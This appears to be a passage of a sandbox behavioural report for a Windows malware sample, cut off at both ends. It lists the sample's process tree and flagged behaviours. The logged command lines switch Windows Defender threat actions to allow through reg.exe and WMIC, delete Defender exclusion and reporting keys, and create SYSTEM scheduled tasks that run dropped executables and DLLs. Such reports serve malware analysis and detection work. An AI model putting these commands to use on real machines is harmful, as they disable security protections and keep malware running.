C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fHOlMGNmDutpzGekG" /SC once /ST 05:50:48 /RU "SYSTEM" /TR "\"C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\abLzenc.exe\" Nv /site_id 394347 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fHOlMGNmDutpzGekG"3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\wDmspnJ.exeC:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\wDmspnJ.exe Nv /site_id 739435 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bOoGaaDxESFbryPOAb"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dIBxqmZBU\qVXSTQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JnrJAucJILlcMMe" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JnrJAucJILlcMMe2" /F /xml "C:\Program Files (x86)\dIBxqmZBU\mmzEkBE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JnrJAucJILlcMMe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JnrJAucJILlcMMe"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OMsCZDeJImgVgl" /F /xml "C:\Program Files (x86)\fSairMrhYOPU2\iHYKFbB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uZdEDCeaKQjVo2" /F /xml "C:\ProgramData\qLBAJgyZHGjWrPVB\pmQrYUb.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FNTeCqGkBmjmyLdgG2" /F /xml "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\XIeUzOL.xml" /RU "SYSTEM"3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OBEOfgleGlpbUoFbTOD2" /F /xml "C:\Program Files (x86)\iOPoQDDXUfpqC\FrwjkHz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PvKMXtxeDKBRRtMew" /SC once /ST 05:36:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\laRuxdflOdEFherP\lmIlXovV\iLTNMHm.dll\",#1 /site_id 739435" /V1 /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PvKMXtxeDKBRRtMew"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuRERNvqitL" /SC once /ST 07:41:37 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\ZJmNNaQo\hjKQMrj.exe\" JB /S"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuRERNvqitL"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuRERNvqitL"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuRERNvqitL"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JoozO1" /SC once /ST 04:39:01 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "JoozO1"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JoozO1"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fHOlMGNmDutpzGekG"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
-
  [2] C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\abLzenc.exe
      C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\abLzenc.exe Nv /site_id 394347 /S
      - Checks computer location settings
      - Drops Chrome extension
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Modifies data under HKEY_USERS
    [3] C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
            - Blocklisted process makes network request
            - Loads dropped DLL
            - Checks processor information in registry
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
              - Blocklisted process makes network request
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                - Checks computer location settings
                - Checks whether UAC is enabled
                - Drops file in Windows directory
                - Modifies Control Panel
                - Modifies Internet Explorer settings
                - Modifies registry class
                - Suspicious use of SetWindowsHookEx
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "bOoGaaDxESFbryPOAb"
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dIBxqmZBU\YkvsFn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JnrJAucJILlcMMe" /V1 /F
        - Drops file in Windows directory
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "JnrJAucJILlcMMe2" /F /xml "C:\Program Files (x86)\dIBxqmZBU\MUxabrz.xml" /RU "SYSTEM"
        - Creates scheduled task(s)
      [4] C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /END /TN "JnrJAucJILlcMMe"
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "JnrJAucJILlcMMe"
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "OMsCZDeJImgVgl" /F /xml "C:\Program Files (x86)\fSairMrhYOPU2\uvrUIbH.xml" /RU "SYSTEM"
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "uZdEDCeaKQjVo2" /F /xml "C:\ProgramData\qLBAJgyZHGjWrPVB\TdXDTej.xml" /RU "SYSTEM"
        - Creates scheduled task(s)
      [4] C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "FNTeCqGkBmjmyLdgG2" /F /xml "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\qUmvKit.xml" /RU "SYSTEM"
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "OBEOfgleGlpbUoFbTOD2" /F /xml "C:\Program Files (x86)\iOPoQDDXUfpqC\WktMODE.xml" /RU "SYSTEM"
        - Blocklisted process makes network request
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Loads dropped DLL
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "spuInCFFcSJc" /SC once /ST 07:20:25 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\EOQqLsho\IqRhcst.exe\" JB /S"
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "spuInCFFcSJc"
      [4] C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /END /TN "spuInCFFcSJc"
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "spuInCFFcSJc"
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
          - Modifies data under HKEY_USERS
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    [3] C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "fHOlMGNmDutpzGekG"
        - Modifies Internet Explorer settings
  [2] \??\c:\windows\system32\rundll32.EXE
      c:\windows\system32\rundll32.EXE "C:\Windows\Temp\laRuxdflOdEFherP\lmIlXovV\iLTNMHm.dll",#1 /site_id 739435
    [3] C:\Windows\SysWOW64\rundll32.exe
        c:\windows\system32\rundll32.EXE "C:\Windows\Temp\laRuxdflOdEFherP\lmIlXovV\iLTNMHm.dll",#1 /site_id 739435
        - Blocklisted process makes network request
        - Checks BIOS information in registry
        - Loads dropped DLL
        - Enumerates system info in registry
      [4] C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "PvKMXtxeDKBRRtMew"
  [2] C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\ZJmNNaQo\hjKQMrj.exe
      C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\ZJmNNaQo\hjKQMrj.exe JB /S
      - Modifies Internet Explorer settings
    [3] C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
            [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      [4] C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        [5] C:\Windows\SysWOW64\cmd.exe
